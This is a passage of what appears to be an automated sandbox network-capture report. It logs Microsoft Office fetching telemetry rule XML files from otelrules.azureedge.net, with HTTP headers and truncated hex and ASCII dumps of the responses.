                                                                                                                                                                                          2024-11-23 16:45:21 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          136192.168.2.54990713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:22 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:22 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:22 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1405
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                          x-ms-request-id: 6d8f64b9-901e-005b-763b-3c2005000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164522Z-178bfbc474bh5zbqhC1NYCkdug00000004p0000000009yvu
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:22 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          137192.168.2.54990513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:22 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:22 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1415
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                          x-ms-request-id: 150e742e-301e-0033-3994-3bfa9c000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164522Z-15b8b599d88hd9g7hC1TEBp75c000000035g000000009hcd
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:23 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          138192.168.2.54990413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:22 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:23 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1388
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                          x-ms-request-id: 4c6a8f70-a01e-000d-057c-3bd1ea000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164523Z-174c587ffdf59vqchC1TEByk6800000003eg000000000nwx
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:23 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          139192.168.2.54990613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:22 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:23 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1378
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                          x-ms-request-id: de9d050e-401e-0078-2067-3b4d34000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164523Z-178bfbc474bp8mkvhC1NYCzqnn00000004e000000000ns1b
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:23 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          140192.168.2.54990813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:23 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:23 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1368
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                          x-ms-request-id: cd486f0a-401e-0048-5b49-3c0409000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164523Z-178bfbc474brk967hC1NYCfu6000000004fg00000000e599
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:23 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          141192.168.2.54990913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:24 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1415
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                          x-ms-request-id: afa98cfc-701e-003e-2a3c-3c79b3000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164525Z-178bfbc474bbbqrhhC1NYCvw7400000004sg00000000max1
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:25 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          142192.168.2.54991013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:24 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1378
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE584C214"
                                                                                                                                                                                          x-ms-request-id: 6db8bce5-501e-0078-354f-3c06cf000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164525Z-15b8b599d88g5tp8hC1TEByx6w0000000360000000008nb9
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:25 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          143192.168.2.54991113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:25 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1407
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                          x-ms-request-id: 4e85307b-101e-007a-398c-3a047e000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164525Z-174c587ffdfgcs66hC1TEB69cs0000000330000000007twc
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:25 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          144192.168.2.54991213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:25 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1370
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                          x-ms-request-id: 24867866-a01e-0053-1264-3b8603000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164525Z-178bfbc474bgvl54hC1NYCsfuw00000004m000000000kq32
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:25 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          145192.168.2.54991313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:25 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
